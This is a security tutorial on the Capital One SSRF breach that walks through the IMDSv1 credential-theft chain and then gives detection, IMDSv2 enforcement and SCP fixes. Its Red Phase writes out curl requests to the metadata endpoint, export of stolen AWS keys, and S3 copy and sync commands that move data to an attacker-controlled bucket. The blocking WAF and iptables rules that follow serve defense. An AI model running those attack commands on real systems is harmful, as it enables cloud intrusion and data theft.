The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. AWS released IMDSv2 in November 2019, about four months after the breach was disclosed (July 2019), so IMDSv2 was not available when the attack took place, and IMDSv1 remained available afterward. What the breach demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.

The lesson the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability in software running on the instance (the application, a WAF, a sidecar) is a straight line to your IAM role credentials. The SSRF doesn’t need to be severe or complex. It just needs to reach 169.254.169.254.

Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints
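For any of the features listed above, one application-layer mitigation is to refuse fetches whose destination resolves to an internal range. Below is a minimal Python sketch using the standard `ipaddress` module; the function names are hypothetical, and the caller is assumed to supply the addresses the hostname resolved to (for example, from `socket.getaddrinfo`) and then connect only to an address that was checked.

```python
import ipaddress
from urllib.parse import urlparse


def is_internal_address(address):
    """True for link-local (including 169.254.169.254), loopback, and private ranges."""
    ip = ipaddress.ip_address(address)
    return ip.is_link_local or ip.is_loopback or ip.is_private


def destination_allowed(url, resolved_addresses):
    """Allow only http(s) URLs whose every resolved address is external."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return False
    if not resolved_addresses:
        return False  # nothing resolved, so nothing was verified
    return not any(is_internal_address(addr) for addr in resolved_addresses)


if __name__ == "__main__":
    print(destination_allowed("http://169.254.169.254/latest/meta-data/", ["169.254.169.254"]))
    print(destination_allowed("https://example.com/avatar.png", ["93.184.216.34"]))
```

Checking the resolved addresses rather than the hostname string matters because an attacker-controlled DNS name can point at 169.254.169.254; this guard reduces exposure but does not replace enforcing IMDSv2.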

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-23T00:03:30Z"
}

These are real, valid AWS temporary credentials. The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid

{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: every bucket in the account (requires s3:ListAllMyBuckets on the role)

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
# simulate-principal-policy takes the IAM role ARN, not the STS session ARN
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:iam::123456789012:role/MyApplicationRole" \
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# A list of metadata fields means IMDS is reachable and answering without a token;
# a 401 response means it is reachable but enforcing IMDSv2

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'

[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[] | [?MetadataOptions.HttpTokens==`optional`].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table
# Every row returned is IMDSv1-exposed (HttpTokens is "optional")
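The same audit can be run over saved `describe-instances` output, which is convenient when collecting results from many accounts. This is a minimal Python sketch, assuming the response has been loaded as a dictionary; the function name is an illustrative assumption.

```python
def imdsv1_exposed(describe_instances_response):
    """Return instance IDs whose metadata endpoint is enabled and accepts token-less requests."""
    exposed = []
    for reservation in describe_instances_response.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            options = instance.get("MetadataOptions", {})
            endpoint_on = options.get("HttpEndpoint") == "enabled"
            tokens_optional = options.get("HttpTokens") == "optional"
            if endpoint_on and tokens_optional:
                exposed.append(instance["InstanceId"])
    return exposed


# Sample shaped like the CLI output shown earlier, with a second hardened instance.
sample_response = {
    "Reservations": [
        {
            "Instances": [
                {
                    "InstanceId": "i-01234567890abcdef0",
                    "MetadataOptions": {"HttpTokens": "optional", "HttpEndpoint": "enabled"},
                },
                {
                    "InstanceId": "i-0fedcba9876543210",
                    "MetadataOptions": {"HttpTokens": "required", "HttpEndpoint": "enabled"},
                },
            ]
        }
    ]
}

if __name__ == "__main__":
    print(imdsv1_exposed(sample_response))
```

Instances with the endpoint disabled are skipped, since there is nothing for an SSRF to reach on them.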

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is GetCallerIdentity from an unusual source IP paired with the instance role’s ARN appearing in CloudTrail from an IP that is not the instance itself.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
# The address CloudTrail records for legitimate calls from the instance:
# its public or NAT egress IP, or its private IP when calls go through a VPC endpoint
INSTANCE_IP="10.0.1.50"

# Note: date -d and --iso-8601 are GNU date options
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output json | \
  jq -r --arg role "${DETECTOR_ROLE}" --arg ip "${INSTANCE_IP}" '
    .[] | fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == $role) |
    select(.sourceIPAddress != $ip) |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }'
# Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-1234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.
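
The same check can be applied to CloudTrail records you have already exported. The sketch below is a minimal illustration in Python, assuming each record is a parsed CloudTrail event with userIdentity.arn and sourceIPAddress fields. The function name external_use, the sample events, and the allow-list of CIDRs are hypothetical.

```python
import ipaddress
import re
from typing import Iterable, List

# Matches .../assumed-role/<RoleName>/<session> where the session is an instance ID
INSTANCE_SESSION = re.compile(
    r"assumed-role/(?P<role>[^/]+)/(?P<instance>i-[0-9a-f]{8,17})$"
)


def external_use(events: Iterable[dict], known_cidrs: List[str]) -> List[dict]:
    """Return instance-role events whose source IP is outside known_cidrs."""
    networks = [ipaddress.ip_network(cidr) for cidr in known_cidrs]
    hits = []
    for event in events:
        arn = event.get("userIdentity", {}).get("arn", "")
        match = INSTANCE_SESSION.search(arn)
        if not match:
            continue  # not an instance-role session
        try:
            source = ipaddress.ip_address(event.get("sourceIPAddress", ""))
        except ValueError:
            # sourceIPAddress can be a service name; this sketch skips those
            continue
        if not any(source in network for network in networks):
            hits.append({
                "time": event.get("eventTime"),
                "sourceIP": str(source),
                "role": match.group("role"),
                "instance": match.group("instance"),
            })
    return hits


# Hypothetical events for illustration only
ROLE_ARN = "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/"
EVENTS = [
    {"eventTime": "2024-03-15T02:40:00Z", "sourceIPAddress": "10.0.1.50",
     "userIdentity": {"arn": ROLE_ARN + "i-1234567890abcdef0"}},
    {"eventTime": "2024-03-15T02:47:00Z", "sourceIPAddress": "203.0.113.7",
     "userIdentity": {"arn": ROLE_ARN + "i-1234567890abcdef0"}},
    {"eventTime": "2024-03-15T02:50:00Z", "sourceIPAddress": "203.0.113.9",
     "userIdentity": {"arn": ROLE_ARN + "alice"}},
    {"eventTime": "2024-03-15T02:55:00Z", "sourceIPAddress": "ec2.amazonaws.com",
     "userIdentity": {"arn": ROLE_ARN + "i-1234567890abcdef0"}},
]

if __name__ == "__main__":
    for hit in external_use(EVENTS, ["10.0.1.50/32"]):
        print(hit)
```

Matching on the session name rather than the role name alone keeps human or CI sessions of the same role out of the results.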

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely, meaning someone has exfiltrated the credentials to their own system and is using them from there.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.AwsApiCallAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

Recon:IAMUser/UserPermissions — fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker’s Step 4 above). Often appears immediately before the data exfiltration events.

VPC Flow Logs: Connections to 169.254.169.254

VPC Flow Logs do not record traffic to the IMDS endpoint: AWS documents traffic to and from 169.254.169.254 as excluded from flow logs. They can still capture egress from EC2 instances in ways that reveal post-exploitation. The query below is therefore a sanity check rather than a primary detection; on standard EC2 networking it is expected to return nothing, and any rows it does return are worth investigating:

-- Athena query against VPC flow logs
-- Find: connections to 169.254.169.254 from unexpected source IPs
-- (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

If you see source IPs in this query that are not your EC2 instance’s primary private IP — for example, container IPs within the pod CIDR — and you have --http-put-response-hop-limit 1 set, those requests should be failing. If they’re succeeding, the hop limit is not enforced.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, the response to the PUT request, which carries the IMDSv2 token, is sent with an IP TTL of 1. When a process running inside a container requests a token, that response must travel back along:

Hypervisor IMDS endpoint → host network namespace → veth pair → container network namespace

The host has to forward the packet into the container’s namespace, which decrements the TTL to 0, so the response is dropped before it reaches the container. The container never receives a token. The GET request that follows has no token and, if --http-tokens required is also set, is rejected.

Hop limit = 1:
  IMDS → host → [TTL=0, response dropped before the veth]
  Container never receives the token

Hop limit = 2 (required for EKS with IMDS access):
  Container → veth → host → IMDS
  Token is issued; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity: pods get short-lived tokens scoped to their service account, not the node’s IAM role.
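
The TTL arithmetic behind the hop limit can be sketched in a few lines. This is a simplified Python model, not AWS’s implementation: it assumes the token packet starts with a TTL equal to the hop limit, that each forwarding step between the IMDS endpoint and the caller decrements it by one, and that a pod on a bridged network adds one such step while a process on the host adds none. The function name token_delivered is hypothetical.

```python
def token_delivered(hop_limit: int, forwarding_hops: int) -> bool:
    """Model whether a packet with TTL=hop_limit survives forwarding_hops hops."""
    ttl = hop_limit
    for _ in range(forwarding_hops):
        ttl -= 1  # every forwarding step decrements the TTL
        if ttl <= 0:
            return False  # packet is discarded instead of being forwarded
    return True


# Assumed hop counts for illustration: host process = 0, bridged pod = 1
CALLERS = {"process on the host": 0, "pod on a bridged network": 1}

if __name__ == "__main__":
    for limit in (1, 2):
        for caller, hops in CALLERS.items():
            outcome = "token delivered" if token_delivered(limit, hops) else "dropped"
            print(f"hop limit {limit}, {caller}: {outcome}")
```

Under these assumptions a pod that shares the host network namespace behaves like a host process, which is one reason the hop limit is a complement to pod-level identity rather than a substitute for it.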

Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. The operational cost is near zero; the risk reduction is complete for the SSRF-to-IMDS credential chain.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced

# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'

# Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently "optional"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[] | [?MetadataOptions.HttpTokens==`optional`].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read -r instance_id; do
    # Skip blank lines so an empty result never triggers a malformed call
    [ -n "$instance_id" ] || continue
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:Attribute/HttpTokens": "optional"
        }
      }
    }
  ]
}

Apply this SCP to all OUs except the management account. New ec2:RunInstances calls that don’t include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.
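
To reason about which launches the first statement blocks, it helps to evaluate the condition by hand. The sketch below is a deliberately simplified Python model of Deny matching, assuming only the StringEquals and StringNotEquals operators with single string values. It ignores resource matching, wildcards, and the rest of IAM policy evaluation, and deny_matches and the request contexts are hypothetical.

```python
def deny_matches(statement: dict, action: str, context: dict) -> bool:
    """Return True if a Deny statement applies to the action and context."""
    if statement.get("Effect") != "Deny":
        return False
    actions = statement["Action"]
    if isinstance(actions, str):
        actions = [actions]
    if action not in actions:
        return False
    for operator, conditions in statement.get("Condition", {}).items():
        for key, expected in conditions.items():
            actual = context.get(key)  # None when the request omits the key
            if operator == "StringEquals":
                if actual != expected:
                    return False
            elif operator == "StringNotEquals":
                # A missing key counts as "not equal", so the Deny still applies
                if actual == expected:
                    return False
            else:
                raise ValueError(f"operator not modelled in this sketch: {operator}")
    return True


# First statement of the SCP above
RUN_INSTANCES_DENY = {
    "Sid": "RequireIMDSv2OnNewInstances",
    "Effect": "Deny",
    "Action": "ec2:RunInstances",
    "Resource": "arn:aws:ec2:*:*:instance/*",
    "Condition": {"StringNotEquals": {"ec2:MetadataHttpTokens": "required"}},
}

if __name__ == "__main__":
    for context in ({"ec2:MetadataHttpTokens": "required"},
                    {"ec2:MetadataHttpTokens": "optional"},
                    {}):
        denied = deny_matches(RUN_INSTANCES_DENY, "ec2:RunInstances", context)
        print(context, "-> denied" if denied else "-> not denied by this statement")
```

The empty context is the case worth noticing: a launch that says nothing about metadata options is denied as well, which is why launch templates and automation need the setting in place before the SCP is attached.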

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity removes the credential from the picture entirely: there is no long-lived IAM role credential attached to the instance, so there is nothing for SSRF to retrieve.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defence in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS

# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.

⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. Older releases of the AWS SDK for Java v1 (before 1.11.678) and of the AWS SDK for Python (boto3 before 1.12.6, the minimum AWS documents for IMDSv2) cannot request session tokens. Enforcing --http-tokens required on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions; that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# AWS documents boto3 >= 1.12.6 as the minimum for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default
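
Version strings from these checks should be compared numerically, not as text: as plain strings, "1.11.1034" sorts before "1.11.678". The following is a minimal Python sketch of a numeric comparison, using the Java v1 threshold quoted above as the example. The helper names parse_version and meets_minimum are hypothetical.

```python
import re
from typing import Tuple


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '1.11.678' (or '1.11.678-SNAPSHOT') into (1, 11, 678)."""
    match = re.match(r"\d+(?:\.\d+)*", version.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def meets_minimum(installed: str, minimum: str) -> bool:
    """Compare dotted versions component by component as integers."""
    return parse_version(installed) >= parse_version(minimum)


JAVA_V1_MINIMUM = "1.11.678"  # threshold quoted in the text above

if __name__ == "__main__":
    for installed in ("1.11.600", "1.11.678", "1.11.1034"):
        status = "ok" if meets_minimum(installed, JAVA_V1_MINIMUM) else "upgrade first"
        print(f"aws-java-sdk-core {installed}: {status}")
```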

EKS node groups and hop limit 2. If you run EKS and pods use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS: they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. Managed node groups created with aws eks create-nodegroup have commonly defaulted to hop limit 2 for this reason, though the value depends on the AMI family and launch template, so check MetadataOptions on a running node; you can reduce it once you’ve confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

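# EventBridge rule: match S3 GetObject data events made with the application role
# (complements GuardDuty's delayed finding; the rule needs a target, added with
# aws events put-targets, and the target should filter on sourceIPAddress)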
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.

Quick Reference

IMDSv1 vs IMDSv2

Attribute	IMDSv1	IMDSv2
Authentication	None — any HTTP GET works	PUT to `/latest/api/token` required first to obtain a session token
SSRF exploitable	Yes — one HTTP request returns credentials	No — SSRF cannot initiate a PUT before a GET in standard flows
Session token TTL	N/A	1 second to 21,600 seconds (configurable)
Hop limit enforcement	N/A	Enforced on the PUT response: TTL=1 stops the token from reaching containers
AWS CLI enforcement	`--http-tokens optional` (default on old instances)	`--http-tokens required`
Capital One risk	Present	Eliminated

IMDSv2 Enforcement Commands by Provider

Provider	Enforcement Command	Scope
AWS — running instance	`aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1`	Single instance
AWS — launch template	Add `"MetadataOptions": {"HttpTokens": "required"}` to launch template data	All instances from template
AWS — org SCP	Deny `ec2:RunInstances` where `ec2:MetadataHttpTokens != required`	All accounts in org
AWS — Config rule	`ec2-imdsv2-check` managed rule	Compliance audit
GCP	GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires `Metadata-Flavor: Google` header — this header cannot be set via SSRF in most frameworks	N/A
Azure	Azure IMDS requires `Metadata: true` header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls)	N/A

Note on GCP and Azure: Both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.

Key Takeaways

IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
